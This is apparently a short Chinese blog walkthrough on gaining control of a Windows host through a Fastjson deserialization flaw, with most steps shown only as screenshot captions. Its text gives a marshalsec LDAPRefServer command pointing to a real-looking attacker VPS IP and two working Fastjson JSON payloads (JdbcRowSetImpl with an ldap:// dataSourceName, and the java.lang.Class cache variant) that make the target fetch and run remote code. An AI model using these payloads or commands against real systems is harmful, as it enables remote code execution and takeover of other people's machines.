fastjson windows主机上线

首先创建一个win类,作为命令执行的类
fastjson windows主机上线_第1张图片
然后写一个漏洞Fastjson的执行类
fastjson windows主机上线_第2张图片
将我们的win类传上vps
fastjson windows主机上线_第3张图片
然后开启web服务
fastjson windows主机上线_第4张图片
接下来利用ldap协议

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://185.239.225.205:80/#win 6666

fastjson windows主机上线_第5张图片
然后我们运行项目
fastjson windows主机上线_第6张图片
fastjson windows主机上线_第7张图片
我们在模拟环境中利用fastjson
这里我们win修改成如下:
fastjson windows主机上线_第8张图片
传到vps上
fastjson windows主机上线_第9张图片
抓包后是get请求,我们将其放到repeater中,修改成post请求,修改成json格式
fastjson windows主机上线_第10张图片
json我们直接从这里拿取即可

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://185.239.225.205:6666/win","autoCommit":true}

fastjson windows主机上线_第11张图片
可以看到windows主机成功上线

还可以换一个我们现在最常用的payload

{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://185.239.225.205:6666/win",
"autoCommit":true
}
}

fastjson windows主机上线_第12张图片
可以看到仍然可以成功上线

你可能感兴趣的:(red,JAVA,windows,网络安全,java)